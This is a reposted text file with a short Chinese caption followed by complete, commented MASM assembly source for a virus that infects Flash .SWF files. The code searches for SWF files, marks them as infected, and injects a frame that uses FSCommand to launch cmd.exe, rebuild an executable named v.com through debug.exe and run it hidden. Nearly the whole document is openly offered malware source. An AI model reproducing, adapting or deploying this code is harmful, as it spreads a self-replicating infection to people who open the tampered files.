flash.txt

一只flash病毒的源代码,有详细的说明

; ------------------ 
; Des cription: WinNT/XP Virus dropper for Flash .SWF files! 
; Masm Version 6.11: ML.EXE SWF.ASM 
; Virus Size: 926 bytes 
; Infection Size: 3247 bytes. 
; Last Edit: 01/08/2002 


; --------------------------------- Begin Source Code ------------------------------------ 
.286 
.model tiny 
.code 
org 100h 

Entry: jmp Start 

VIR_SIZE equ Virus_End-Entry 

DTA db 128 dup(0) ; Offset DTA+30 = filename 
HANDLE dw ? ; Handle to host file 
PTR1 dd 0 ; Segment address of the created memory block 
PATH db *.SWF ,0 ; File mask 
BINARY db v.com ,0 ; Binary code 
HEX db 0123456789ABCDEF ; Binary to hex 

; Flash header block. 
; ------------------- 
SIGN_FW dw ? ; SWF file format 
SIGN_S db ? 
VERSION_NUM db ? 
FILE_LENGTH dw ? 
dw ? 
STATIC_HDR_SIZE equ $-SIGN_FW 

RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isn"t static. ;( 
RECT_BUF_SIZE equ $-RECT_BUF 

HDR_SIZE dw ? ; Holds the true header size! 

; Start of Viral Frame 0. 
; ----------------------- 
DROP_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes! 
TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG] 
dw 0 
db 083h ; ActionGetUrl Tag 
ACTION_LENGTH dw 0 ; (DROP_BEGIN_SIZE-9)+(SUM OF DROP_MIDDLE)+(DROP_END_SIZE) 
db "FSCommand:exec" 
db 000h 
db "cmd.exe" 
db 009h ; chr(9) is Flash code for a space character. 
db "/c" 
db 009h 
db "echo" 
db 009h 
db "Loading.Flash.Movie..." 
db "&" 
db "(echo" 
db 009h 
db "n" 
db 009h 
db "v.com&echo" 
db 009h 
db "a" 
db 009h 
db "100&" 
DROP_BEGIN_SIZE equ $-DROP_BEGIN 

DROP_MIDDLE db "echo" 
db 009h 
db "db" 
db 009h 
db 71 dup(",") ; db XX,...,XX where XX"s are viral hex codes. 
db "&" 
DROP_MIDDLE_SIZE equ $-DROP_MIDDLE 

DROP_END db "&echo.&echo" 
db 009h 
db "rcx&echo" 
db 009h 
db "39E" ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes. 
db "&echo" 
db 009h 
db "w&echo" 
db 009h 
db "q)|debug.exe>nul&start" 
db 009h 
db "/b" 
db 009h 
db "v.com" 
db 000h ; StringEnd Tag 
DROP_END_SIZE equ $-DROP_END 

; End of Viral Frame 0. 
; --------------------- 
END_TAG db 001h ; Action code 0x01 = tagshowframe Tag 

Start: 
mov ax,(VIR_SIZE+0fh) 
shr ax,4 
shl ax,1 
mov bx,ax ; Allocate (VirusSize*2) 
mov ah,4ah 
int 21h ; Resize block 
jc ExProg 

mov dx,offset DTA ; Set DTA operation 
mov ah,1ah 
int 21h 

mov cx,07h 
mov dx,offset PATH 
mov ah,4eh ; FindFirst 
int 21h 
jc ExProg 
jmp Infect 
Cycle: 
mov dx,offset PATH 
mov ah,4fh ; FindNext 
int 21h 
jc ExProg 
jmp Infect 
ExProg: 
mov ax,4301h ; Hide v.com 
mov cx,02h 
mov dx,offset BINARY 
int 21h 

mov ax,4c00h ; End program 
int 21h 
Infect: 
mov byte ptr DTA[30+12],"$" 
mov dx,offset (DTA+30) 

mov ax,3d02h ; Open host file 
int 21h 
jc ExProg 

mov [HANDLE],ax ; Save file handle 

mov ax,3f00h ; Read file Header 
mov dx,offset SIGN_FW 
mov bx,[HANDLE] 
mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE) 
int 21h 
jc ExProg 

cmp word ptr SIGN_FW,"WF" ; Check for a valid Flash SWF file. 
jne Cycle ; Try another file ... 
cmp byte ptr SIGN_S,"S" 
jne Cycle 
cmp byte ptr VERSION_NUM,099h ; Already infected? 
je Cycle 

mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag. 
xor di,di ; Seems to always exist directly after the header. 
next: cmp byte ptr RECT_BUF[di],043h 
jne not_found 
cmp byte ptr RECT_BUF[di+1],002h 
jne not_found 
jmp found 
not_found: 
inc di 
loop next 
jmp Cycle 
found: 
mov word ptr HDR_SIZE,STATIC_HDR_SIZE 
add word ptr HDR_SIZE,di ; Compute the header size 

mov ax,4200h ; Reset file ptr right after Flash header 
xor cx,cx 
mov dx,[HDR_SIZE] 
int 21h 
jc ExProg 

push bx 
mov ax,word ptr FILE_LENGTH 
add ax,15 
shr ax,4 
mov bx,ax 
mov ah,48h ; Allocate memory for target host file 
int 21h 
pop bx 
jc ExProg 
mov word ptr PTR1[2],ax ; Save pointer to allocated block 

mov cx,word ptr FILE_LENGTH 
sub cx,[HDR_SIZE] 
mov ah,3fh ; Read host file into memory block 
push ds 
lds dx,[PTR1] 
int 21h 
pop ds 
jc ExProg 

mov ax,4200h ; Reset file ptr to the middle code section 
xor cx,cx 
mov dx,[HDR_SIZE] 
add dx,DROP_BEGIN_SIZE 
int 21h 
jc ExProg 

; 
; The following code is a key technique. It simply converts the 
; virus from binary to hex characters and then inserts them into the host 
; using a standard format that DEBUG.EXE expects! Flash only really 
; allows plain text, so this satisfies that condition. 
; 

mov word ptr ACTION_LENGTH,(DROP_BEGIN_SIZE-9+DROP_END_SIZE) 
push bx 
mov cx,VIR_SIZE 
xor si,si 
xor di,di 
ToHex: 
mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber 
mov al,byte ptr Entry[si] 
mov ah,al 
and al,00001111y 
xlat 
mov DROP_MIDDLE[STATIC_HDR_SIZE+di+1],al 
shr ax,12 
xlat 
mov DROP_MIDDLE[STATIC_HDR_SIZE+di],al 
inc si 
inc di 
inc di 
inc di 
mov ax,si 
mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line. 
div bl 
or ah,ah 
jnz cont 
push cx 
xor di,di 
add word ptr ACTION_LENGTH,DROP_MIDDLE_SIZE 
mov bx,[HANDLE] ; Write hex dump entry XX,...,XX 
mov dx,offset DROP_MIDDLE 
mov cx,DROP_MIDDLE_SIZE 
mov ax,4000h 
int 21h 
jc ExProg 
pop cx 
cont: 
loop ToHex 
pop bx 

or di,di 
jz no_remainder 

mov dx,offset DROP_MIDDLE 
mov cx,di 
add cx,7 ; STATIC_HDR_SIZE-1 
add word ptr ACTION_LENGTH,cx 
mov ax,4000h ; Write remainder hex dump entry XX,...,XX 
int 21h 
jc ExProg 

no_remainder: 
mov dx,offset DROP_END 
mov cx,DROP_END_SIZE+1 
mov ax,4000h ; Write end code and end of frame tag(01) into host 
int 21h 
jc ExProg 

mov cx,word ptr FILE_LENGTH 
sub cx,[HDR_SIZE] 
mov ax,4000h ; Write host code directly after viral code. 
push ds 
lds dx,[PTR1] 
int 21h 
pop ds 
jc ExProg 
; Patch the header with new viral values. 
mov cx,word ptr ACTION_LENGTH 
add cx,4 
mov word ptr TAG_LENGTH,cx 
add cx,6 
add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6) 
; Set infection marker 
mov byte ptr VERSION_NUM,099h 

mov di,[HDR_SIZE] 
inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1 

mov ax,4200h ; Re-wind to start of file 
xor cx,cx 
xor dx,dx 
int 21h 
jc ExProg 

mov dx,offset SIGN_FW 
mov cx,[HDR_SIZE] 
mov ax,4000h ; Write updated viral header 
int 21h 
jc ExProg 

mov dx,offset DROP_BEGIN 
mov cx,DROP_BEGIN_SIZE 
mov ax,4000h ; Write begin code into host 
int 21h 
jc ExProg 

mov ah,49h ; Free memory block 
mov es,word ptr PTR1[2] 
int 21h 
jc ExProg 

mov ax,3e00h ; Close file 
int 21h 
jc ExProg 

jmp Cycle ; DONE! Try to infect another. 

Virus_End: 
end Entry 
; --------------------------------- End Source Code ------------------ 
*更多文章请访问:http://www.codesky.net